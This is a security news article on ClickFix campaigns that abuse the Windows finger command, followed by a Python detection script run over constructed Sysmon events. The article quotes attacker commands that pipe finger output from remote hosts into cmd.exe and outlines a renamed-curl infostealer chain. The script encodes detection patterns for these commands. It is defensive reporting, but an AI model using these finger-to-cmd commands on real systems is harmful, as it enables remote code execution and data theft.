The decades-old ‘finger’ command, a utility historically used to look up information about users on Unix and Linux systems via the Finger protocol, is experiencing a troubling resurgence. Although the command was later ported to Windows and is still supported, its general use has significantly declined since its popularity decades ago. However, security researchers have noted that threat actors are now leveraging this dormant protocol to execute remote commands on compromised Windows devices.
When executed, the legitimate finger command is designed to return basic details about a user, such as their login name, home directory, and last seen activity. Unfortunately, recent malicious campaigns are using the Finger protocol in what appear to be ClickFix attacks. These social engineering schemes prompt the victim to run a seemingly harmless Windows command, which secretly uses the finger utility to retrieve and run commands supplied by a remote server. This is not a completely novel technique; researchers warned as far back as 2020 that finger was being used as a Living Off the Land Binary (LOLBIN) to download malware and evade security detection.
A recent example, shared by cybersecurity researcher MalwareHunterTeam, involved a batch file that ran the command finger root@finger.nateams[.]com and piped its output through cmd.exe. This caused the remote server's response to be executed as local commands. Another highly public example occurred when a person on Reddit detailed how they fell victim to a ClickFix attack impersonating a Captcha verification, which tricked them into running a malicious command. The victim entered a command similar to cmd /c start "" /min cmd /c "finger vke@finger.cloudmega[.]org | cmd", unknowingly setting the stage for the attack.
The core of this attack is the abuse of the Finger protocol as a remote script delivery method. By piping the output of the finger request directly into the Windows command processor, cmd.exe, the commands supplied by the attacker's server are executed immediately, with nothing written to disk beforehand. In one captured attack, the executed script created a randomly named path, copied curl.exe to a random filename, and then used the renamed curl to download a zipped malware package disguised as a PDF. This package was then extracted to run a Python malware program using pythonw.exe.
While the exact nature of all payloads is not fully confirmed, a related batch file suggests that this Python package acts as an infostealer. The final action of the script often involves a call back to the attacker's server to confirm successful execution, alongside displaying a fake "Verify you are human" prompt to the user to maintain the deception. MalwareHunterTeam has also identified similar campaigns using different domains, such as one employing finger Kove2@api.metrics-strange.com | cmd, indicating that this technique is in active, widespread use by several threat groups.
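As an added example (not from the article or the researchers it cites), the detection logic below scans constructed Sysmon-style process-creation records for the finger-to-cmd pipe and the renamed-curl follow-on the article describes; the hostnames, paths and filenames in the sample events are placeholders, not real indicators.

```python
import re
from typing import Dict, List

# Constructed Sysmon-style process-creation records (not real telemetry); the
# hostnames are placeholders standing in for the attacker domains in the article.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"Image": r"C:\Windows\System32\cmd.exe", "OriginalFileName": "Cmd.Exe",
     "CommandLine": 'cmd /c start "" /min cmd /c "finger vke@finger.example.invalid | cmd"'},
    {"Image": r"C:\Users\u\AppData\Local\Temp\k3f9\qz1.exe", "OriginalFileName": "curl.exe",
     "CommandLine": r"qz1.exe -o report.pdf https://dl.example.invalid/p"},
    {"Image": r"C:\Windows\System32\finger.exe", "OriginalFileName": "finger.exe",
     "CommandLine": "finger alice@hr.corp.invalid"},
]

# Finger output piped straight into the command processor: the core of the technique.
FINGER_TO_CMD = re.compile(r"\bfinger(?:\.exe)?\s+\S+@\S+\s*\|\s*cmd(?:\.exe)?\b", re.I)
# ClickFix launcher shape: a minimised console window hiding the real command.
HIDDEN_START = re.compile(r'\bstart\s+""\s*/min\b', re.I)

SEVERITY = {"finger_piped_to_cmd": "high", "renamed_curl": "high",
            "hidden_window_start": "medium", "finger_executed": "low"}

def classify_event(event: Dict[str, str]) -> List[str]:
    """Return the detection names that fire for one process-creation event."""
    cmdline = event.get("CommandLine", "")
    image = event.get("Image", "").rsplit("\\", 1)[-1].lower()
    original = event.get("OriginalFileName", "").lower()
    hits = []
    if FINGER_TO_CMD.search(cmdline):
        hits.append("finger_piped_to_cmd")
    if HIDDEN_START.search(cmdline):
        hits.append("hidden_window_start")
    # finger.exe is legitimate but rare enough on modern fleets to log at low severity.
    if image == "finger.exe":
        hits.append("finger_executed")
    # Sysmon records the PE's OriginalFileName, so a copied/renamed curl still says curl.exe.
    if original == "curl.exe" and image != "curl.exe":
        hits.append("renamed_curl")
    return hits

def highest_severity(hits: List[str]) -> str:
    order = ["low", "medium", "high"]
    return max((SEVERITY[h] for h in hits), key=order.index, default="none")

def scan(events: List[Dict[str, str]]):
    """Return (index, severity, hits) for every event that triggers at least one detection."""
    return [(i, highest_severity(h), h) for i, ev in enumerate(events) if (h := classify_event(ev))]

if __name__ == "__main__":
    for idx, sev, hits in scan(SAMPLE_EVENTS):
        print(f"event {idx}: {sev:6} {', '.join(hits)}")
```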